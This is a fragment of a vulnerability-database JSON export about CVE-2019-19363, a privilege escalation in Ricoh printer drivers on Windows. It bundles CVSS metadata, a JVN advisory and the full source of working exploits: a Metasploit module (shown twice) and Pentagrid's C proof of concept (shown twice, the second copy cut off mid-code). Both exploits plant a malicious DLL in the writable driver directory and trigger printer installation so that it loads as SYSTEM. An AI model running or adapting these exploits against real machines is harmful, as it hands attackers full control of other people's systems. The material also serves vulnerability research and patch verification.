"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-10T00:00:00", "type": "zdt", "title": "Ricoh Driver - Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2019-19363"], "modified": "2020-02-10T00:00:00", "id": "1337DAY-ID-33926", "href": "https://0day.today/exploit/description/33926", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ricoh Driver Privilege Escalation',\n 'Description' => %q(\n Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. 
Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Alexander Pudwill', # discovery & PoC\n 'Pentagrid AG', # PoC\n 'Shelby Pace' # msf module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-19363'],\n [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'Payload' =>\n {\n },\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' =>\n [[\n 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }\n ]],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'Stability' => [ SERVICE_RESOURCE_LOSS ]\n },\n 'DisclosureDate' => \"Jan 22 2020\",\n 'DefaultTarget' => 0\n ))\n\n self.needs_cleanup = true\n\n register_advanced_options([\n OptBool.new('ForceExploit', [ false, 'Override check result', false ])\n ])\n end\n\n def check\n dir_name = \"C:\\\\ProgramData\\\\RICOH_DRV\"\n\n return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)\n driver_names = dir(dir_name)\n\n return CheckCode::Detected(\"Detected Ricoh driver directory, but no installed drivers\") unless driver_names.length\n\n vulnerable = false\n driver_names.each do |driver_name|\n full_path = \"#{dir_name}\\\\#{driver_name}\\\\_common\\\\dlz\"\n next unless directory?(full_path)\n @driver_path = full_path\n\n res = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\")\n next unless res.include?('Everyone:')\n next unless res.match(/\\(F\\)/)\n\n vulnerable = true\n break\n end\n\n return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable\n\n vprint_status(\"Vulnerable driver directory: #{@driver_path}\")\n CheckCode::Appears('Ricoh driver directory has full permissions')\n end\n\n def add_printer(driver_name)\n fail_with(Failure::NotFound, 'Printer driver script not found') unless 
file?(@script_path)\n\n dll_data = generate_payload_dll\n dll_path = \"#{@driver_path}\\\\headerfooter.dll\"\n\n temp_path = expand_path('%TEMP%\\\\headerfooter.dll')\n vprint_status(\"Writing dll to #{temp_path}\")\n\n bat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\")\n cp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\"\n bat_file = <<~HEREDOC\n :repeat\n #{cp_cmd} && goto :repeat\n HEREDOC\n\n write_file(bat_file_path, bat_file)\n write_file(temp_path, dll_data)\n register_files_for_cleanup(bat_file_path, temp_path)\n\n script_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\"\n bat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\"\n print_status(\"Adding printer #{@printer_name}...\")\n client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })\n vprint_status(\"Executing script...\")\n cmd_exec(bat_cmd)\n rescue Rex::Post::Meterpreter::RequestError => e\n e_log(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n end\n\n def exploit\n fail_with(Failure::None, 'Already running as SYSTEM') if is_system?\n\n fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'\n\n if sysinfo['Architecture'] != payload.arch.first\n fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')\n end\n\n @driver_path = ''\n unless check == CheckCode::Appears || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable. 
Set ForceExploit to override')\n end\n\n @printer_name = Rex::Text.rand_text_alpha(5..9)\n @script_path = \"C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs\"\n drvr_name = @driver_path.split('\\\\')\n drvr_name_idx = drvr_name.index('RICOH_DRV') + 1\n drvr_name = drvr_name[drvr_name_idx]\n\n add_printer(drvr_name)\n end\n\n def cleanup\n print_status(\"Deleting printer #{@printer_name}\")\n Rex.sleep(3)\n delete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\"\n client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })\n end\nend\n", "sourceHref": "https://0day.today/exploit/33926", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-18T09:45:41", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-22T00:00:00", "type": "zdt", "title": "Ricoh Printer Drivers - Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363"], "modified": "2020-01-22T00:00:00", "id": "1337DAY-ID-33859", "href": "https://0day.today/exploit/description/33859", "sourceData": 
"/*\n\nThis proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites\na DLL file before the library is loaded (CVE-2019-19363).\n\nWritten by Pentagrid AG, 2019.\n\nCf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/\n\nCredits: Alexander Pudwill\n\nThis proof of concept code is based on the ReadDirectoryChangesW API call to\nget notified about changes on files and directories and reuses parts from the example from\nhttps://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html\n\n*/\n#include <stdio.h>\n#include <stdlib.h>\n#include <conio.h>\n#include <windows.h>\n\n#define MAX_BUFFER 4096\n\nint change_counter = 0;\nconst WCHAR * const BaseDirName = L\"C:\\\\ProgramData\";\nconst WCHAR * TargetDllFullFilePath, * TargetDLLRelFilePath, * MaliciousLibraryFile, * PrinterName;\nDWORD dwNotifyFilter = FILE_NOTIFY_CHANGE_LAST_WRITE |\n FILE_NOTIFY_CHANGE_SIZE |\n FILE_NOTIFY_CHANGE_LAST_ACCESS |\n FILE_NOTIFY_CHANGE_CREATION;\n\ntypedef struct _DIRECTORY_INFO {\n HANDLE hDir;\n TCHAR lpszDirName[MAX_PATH];\n CHAR lpBuffer[MAX_BUFFER];\n DWORD dwBufLength;\n OVERLAPPED Overlapped;\n} DIRECTORY_INFO, *PDIRECTORY_INFO, *LPDIRECTORY_INFO;\n\nDIRECTORY_INFO DirInfo;\n\nvoid WINAPI HandleDirectoryChange(DWORD dwCompletionPort) {\n DWORD numBytes, cbOffset;\n LPDIRECTORY_INFO di;\n LPOVERLAPPED lpOverlapped;\n PFILE_NOTIFY_INFORMATION fni;\n WCHAR FileName[MAX_PATH];\n\n do {\n\n GetQueuedCompletionStatus((HANDLE)dwCompletionPort, &numBytes, (LPDWORD)&di, &lpOverlapped, INFINITE);\n\n if (di) {\n fni = (PFILE_NOTIFY_INFORMATION)di->lpBuffer;\n\n do {\n cbOffset = fni->NextEntryOffset;\n\n // get filename\n size_t num_elem = fni->FileNameLength / sizeof(WCHAR);\n if (num_elem >= sizeof(FileName) / sizeof(WCHAR)) num_elem = 0;\n\n wcsncpy_s(FileName, sizeof(FileName)/sizeof(WCHAR), fni->FileName, num_elem);\n FileName[num_elem] = '\\0';\n 
wprintf(L\"+ Event for %s [%d]\\n\", FileName, change_counter);\n\n if (fni->Action == FILE_ACTION_MODIFIED) {\n\n if (!wcscmp(FileName, TargetDLLRelFilePath)) {\n\n if (change_counter > 0)\n change_counter--;\n if (change_counter == 0) {\n change_counter--;\n\n if (CopyFile(MaliciousLibraryFile, TargetDllFullFilePath, FALSE))\n wprintf(L\"+ File %s copied to %s.\\n\", MaliciousLibraryFile, TargetDllFullFilePath);\n\n else {\n wchar_t buf[256];\n\n FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,\n NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),\n buf, (sizeof(buf) / sizeof(wchar_t)), NULL);\n\n wprintf(L\"+ Failed to copy file %s to %s: %s\\n\", MaliciousLibraryFile, TargetDllFullFilePath, buf);\n }\n\n exit(1);\n } // end of trigger part\n }\n } // eo action mod\n fni = (PFILE_NOTIFY_INFORMATION)((LPBYTE)fni + cbOffset);\n\n } while (cbOffset);\n\n // Reissue the watch command\n ReadDirectoryChangesW(di->hDir, di->lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &di->dwBufLength, &di->Overlapped, NULL);\n }\n } while (di);\n}\n\nvoid WINAPI InstallPrinter() {\n WCHAR cmd_buf[1000];\n swprintf(cmd_buf, sizeof(cmd_buf), L\"/c rundll32 printui.dll, PrintUIEntry /if /b \\\"Printer\\\" /r lpt1: /m \\\"%s\\\"\", PrinterName);\n wprintf(L\"+ Adding printer: %s\\n\", cmd_buf);\n\n unsigned long ret = (unsigned long) ShellExecuteW(0, L\"open\", L\"cmd\", cmd_buf, NULL, SW_HIDE);\n if(ret <= 32) // That seems to be the way to handle ShellExecuteW's ret value.\n wprintf(L\"+ Failed launching command. 
Return value is %d\\n\", ret);\n}\n\nvoid WINAPI WatchDirectories(HANDLE hCompPort) {\n DWORD tid;\n HANDLE hThread;\n\n ReadDirectoryChangesW(DirInfo.hDir, DirInfo.lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &DirInfo.dwBufLength, &DirInfo.Overlapped, NULL);\n\n // Create a thread to sit on the directory changes\n hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)HandleDirectoryChange, hCompPort, 0, &tid);\n\n // Just loop and wait for the user to quit\n InstallPrinter();\n while (_getch() != 'q');\n\n // The user has quit - clean up\n PostQueuedCompletionStatus(hCompPort, 0, 0, NULL);\n\n // Wait for the Directory thread to finish before exiting\n WaitForSingleObject(hThread, INFINITE);\n CloseHandle(hThread);\n}\n\n\nint wmain(int argc, WCHAR *argv[]) {\n HANDLE hCompPort = NULL; // Handle To a Completion Port\n\n if (argc == 6) {\n PrinterName = argv[1];\n TargetDllFullFilePath = argv[2];\n TargetDLLRelFilePath = argv[3];\n MaliciousLibraryFile = argv[4];\n change_counter = _wtoi(argv[5]);\n }\n else {\n wprintf(L\"+ Usage: %s <printer_name> <fullpath_monitor_dll> <rel_path_monitor_dll> <new_dll> <counter>\\n\", argv[0]);\n return 0;\n }\n wprintf(L\"+ Monitoring directory %s\\n\", BaseDirName);\n\n // Get a handle to the directory\n DirInfo.hDir = CreateFile(BaseDirName,\n FILE_LIST_DIRECTORY,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n OPEN_EXISTING,\n FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED,\n NULL);\n\n if (DirInfo.hDir == INVALID_HANDLE_VALUE) {\n wprintf(L\"Unable to open directory %s. GLE=%ld. 
Terminating...\\n\",\n BaseDirName, GetLastError());\n return 0;\n }\n\n lstrcpy(DirInfo.lpszDirName, BaseDirName);\n\n if (HANDLE hFile = CreateFile(TargetDllFullFilePath,\n GENERIC_WRITE,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n CREATE_ALWAYS,\n FILE_ATTRIBUTE_NORMAL,\n NULL)) {\n wprintf(L\"+ File %s created\\n\", TargetDllFullFilePath);\n CloseHandle(hFile);\n }\n else\n wprintf(L\"+ File %s could not be created\\n\", TargetDllFullFilePath);\n\n\n if ((hCompPort = CreateIoCompletionPort(DirInfo.hDir, hCompPort, (ULONG_PTR)&DirInfo, 0)) == NULL) {\n wprintf(L\"+ CreateIoCompletionPort() failed.\\n\");\n return 0;\n }\n\n wprintf(L\"+ Press <q> to exit\\n\");\n\n // Start watching\n WatchDirectories(hCompPort);\n\n CloseHandle(DirInfo.hDir);\n CloseHandle(hCompPort);\n return 1;\n}\n", "sourceHref": "https://0day.today/exploit/33859", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "jvn": [{"lastseen": "2023-05-29T16:25:45", "description": "Multiple RICOH printer drivers contain a privilege escalation vulnerability.\n\n ## Impact\n\nIf a user who can login to the computer where the affected printer driver is installed uses the specially crafted printer driver, that may result in administrative privileges being taken by privilege escalation.\n\n ## Solution\n\n**Apply the Patch** \nApply the approriate patch according to the information provided by the developer.\n\n ## Products Affected\n\nA wide range of the products is affected. 
\nFor more information, refer to the [information provided by the developer](<https://www.ricoh.com/info/2020/0122_1/list>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-25T00:00:00", "type": "jvn", "title": "JVN#15697526: Privilege escalation vulnerability in multiple RICOH printer drivers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363"], "modified": "2020-02-25T00:00:00", "id": "JVN:15697526", "href": "http://jvn.jp/en/jp/JVN15697526/index.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-05-29T16:24:30", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-10T00:00:00", "type": "exploitdb", "title": "Ricoh Driver - Privilege 
Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-19363", "CVE-2019-19363"], "modified": "2020-02-10T00:00:00", "id": "EDB-ID:48036", "href": "https://www.exploit-db.com/exploits/48036", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ricoh Driver Privilege Escalation',\n 'Description' => %q(\n Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. 
Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Alexander Pudwill', # discovery & PoC\n 'Pentagrid AG', # PoC\n 'Shelby Pace' # msf module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-19363'],\n [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'Payload' =>\n {\n },\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' =>\n [[\n 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }\n ]],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'Stability' => [ SERVICE_RESOURCE_LOSS ]\n },\n 'DisclosureDate' => \"Jan 22 2020\",\n 'DefaultTarget' => 0\n ))\n\n self.needs_cleanup = true\n\n register_advanced_options([\n OptBool.new('ForceExploit', [ false, 'Override check result', false ])\n ])\n end\n\n def check\n dir_name = \"C:\\\\ProgramData\\\\RICOH_DRV\"\n\n return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)\n driver_names = dir(dir_name)\n\n return CheckCode::Detected(\"Detected Ricoh driver directory, but no installed drivers\") unless driver_names.length\n\n vulnerable = false\n driver_names.each do |driver_name|\n full_path = \"#{dir_name}\\\\#{driver_name}\\\\_common\\\\dlz\"\n next unless directory?(full_path)\n @driver_path = full_path\n\n res = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\")\n next unless res.include?('Everyone:')\n next unless res.match(/\\(F\\)/)\n\n vulnerable = true\n break\n end\n\n return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable\n\n vprint_status(\"Vulnerable driver directory: #{@driver_path}\")\n CheckCode::Appears('Ricoh driver directory has full permissions')\n end\n\n def add_printer(driver_name)\n fail_with(Failure::NotFound, 'Printer driver script not found') unless 
file?(@script_path)\n\n dll_data = generate_payload_dll\n dll_path = \"#{@driver_path}\\\\headerfooter.dll\"\n\n temp_path = expand_path('%TEMP%\\\\headerfooter.dll')\n vprint_status(\"Writing dll to #{temp_path}\")\n\n bat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\")\n cp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\"\n bat_file = <<~HEREDOC\n :repeat\n #{cp_cmd} && goto :repeat\n HEREDOC\n\n write_file(bat_file_path, bat_file)\n write_file(temp_path, dll_data)\n register_files_for_cleanup(bat_file_path, temp_path)\n\n script_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\"\n bat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\"\n print_status(\"Adding printer #{@printer_name}...\")\n client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })\n vprint_status(\"Executing script...\")\n cmd_exec(bat_cmd)\n rescue Rex::Post::Meterpreter::RequestError => e\n e_log(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n end\n\n def exploit\n fail_with(Failure::None, 'Already running as SYSTEM') if is_system?\n\n fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'\n\n if sysinfo['Architecture'] != payload.arch.first\n fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')\n end\n\n @driver_path = ''\n unless check == CheckCode::Appears || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable. 
Set ForceExploit to override')\n end\n\n @printer_name = Rex::Text.rand_text_alpha(5..9)\n @script_path = \"C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs\"\n drvr_name = @driver_path.split('\\\\')\n drvr_name_idx = drvr_name.index('RICOH_DRV') + 1\n drvr_name = drvr_name[drvr_name_idx]\n\n add_printer(drvr_name)\n end\n\n def cleanup\n print_status(\"Deleting printer #{@printer_name}\")\n Rex.sleep(3)\n delete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\"\n client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })\n end\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/local/48036.rb", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-29T16:24:33", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-22T00:00:00", "type": "exploitdb", "title": "Ricoh Printer Drivers - Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-19363", "CVE-2019-19363"], "modified": "2020-01-22T00:00:00", "id": "EDB-ID:47962", "href": 
"https://www.exploit-db.com/exploits/47962", "sourceData": "/*\n\nThis proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites\na DLL file before the library is loaded (CVE-2019-19363).\n\nWritten by Pentagrid AG, 2019.\n\nCf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/\n\nCredits: Alexander Pudwill\n\nThis proof of concept code is based on the ReadDirectoryChangesW API call to\nget notified about changes on files and directories and reuses parts from the example from\nhttps://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html\n\n*/\n#include <stdio.h>\n#include <stdlib.h>\n#include <conio.h>\n#include <windows.h>\n\n#define MAX_BUFFER 4096\n\nint change_counter = 0;\nconst WCHAR * const BaseDirName = L\"C:\\\\ProgramData\";\nconst WCHAR * TargetDllFullFilePath, * TargetDLLRelFilePath, * MaliciousLibraryFile, * PrinterName;\nDWORD dwNotifyFilter = FILE_NOTIFY_CHANGE_LAST_WRITE |\n FILE_NOTIFY_CHANGE_SIZE |\n FILE_NOTIFY_CHANGE_LAST_ACCESS |\n FILE_NOTIFY_CHANGE_CREATION;\n\ntypedef struct _DIRECTORY_INFO {\n HANDLE hDir;\n TCHAR lpszDirName[MAX_PATH];\n CHAR lpBuffer[MAX_BUFFER];\n DWORD dwBufLength;\n OVERLAPPED Overlapped;\n} DIRECTORY_INFO, *PDIRECTORY_INFO, *LPDIRECTORY_INFO;\n\nDIRECTORY_INFO DirInfo;\n\nvoid WINAPI HandleDirectoryChange(DWORD dwCompletionPort) {\n DWORD numBytes, cbOffset;\n LPDIRECTORY_INFO di;\n LPOVERLAPPED lpOverlapped;\n PFILE_NOTIFY_INFORMATION fni;\n WCHAR FileName[MAX_PATH];\n\n do {\n\n GetQueuedCompletionStatus((HANDLE)dwCompletionPort, &numBytes, (LPDWORD)&di, &lpOverlapped, INFINITE);\n\n if (di) {\n fni = (PFILE_NOTIFY_INFORMATION)di->lpBuffer;\n\n do {\n cbOffset = fni->NextEntryOffset;\n\n // get filename\n size_t num_elem = fni->FileNameLength / sizeof(WCHAR);\n if (num_elem >= sizeof(FileName) / sizeof(WCHAR)) num_elem = 0;\n\n wcsncpy_s(FileName, sizeof(FileName)/sizeof(WCHAR), 
fni->FileName, num_elem);\n FileName[num_elem] = '\\0';\n wprintf(L\"+ Event for %s [%d]\\n\", FileName, change_counter);\n\n if (fni->Action == FILE_ACTION_MODIFIED) {\n\n if (!wcscmp(FileName, TargetDLLRelFilePath)) {\n\n if (change_counter > 0)\n change_counter--;\n if (change_counter == 0) {\n change_counter--;\n\n if (CopyFile(MaliciousLibraryFile, TargetDllFullFilePath, FALSE))\n wprintf(L\"+ File %s copied to %s.\\n\", MaliciousLibraryFile, TargetDllFullFilePath);\n\n else {\n wchar_t buf[256];\n\n FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,\n NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),\n buf, (sizeof(buf) / sizeof(wchar_t)), NULL);\n\n wprintf(L\"+ Failed to copy file %s to %s: %s\\n\", MaliciousLibraryFile, TargetDllFullFilePath, buf);\n }\n\n exit(1);\n } // end of trigger part\n }\n } // eo action mod\n fni = (PFILE_NOTIFY_INFORMATION)((LPBYTE)fni + cbOffset);\n\n } while (cbOffset);\n\n // Reissue the watch command\n ReadDirectoryChangesW(di->hDir, di->lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &di->dwBufLength, &di->Overlapped, NULL);\n }\n } while (di);\n}\n\nvoid WINAPI InstallPrinter() {\n WCHAR cmd_buf[1000];\n swprintf(cmd_buf, sizeof(cmd_buf), L\"/c rundll32 printui.dll, PrintUIEntry /if /b \\\"Printer\\\" /r lpt1: /m \\\"%s\\\"\", PrinterName);\n wprintf(L\"+ Adding printer: %s\\n\", cmd_buf);\n\n unsigned long ret = (unsigned long) ShellExecuteW(0, L\"open\", L\"cmd\", cmd_buf, NULL, SW_HIDE);\n if(ret <= 32) // That seems to be the way to handle ShellExecuteW's ret value.\n wprintf(L\"+ Failed launching command. 
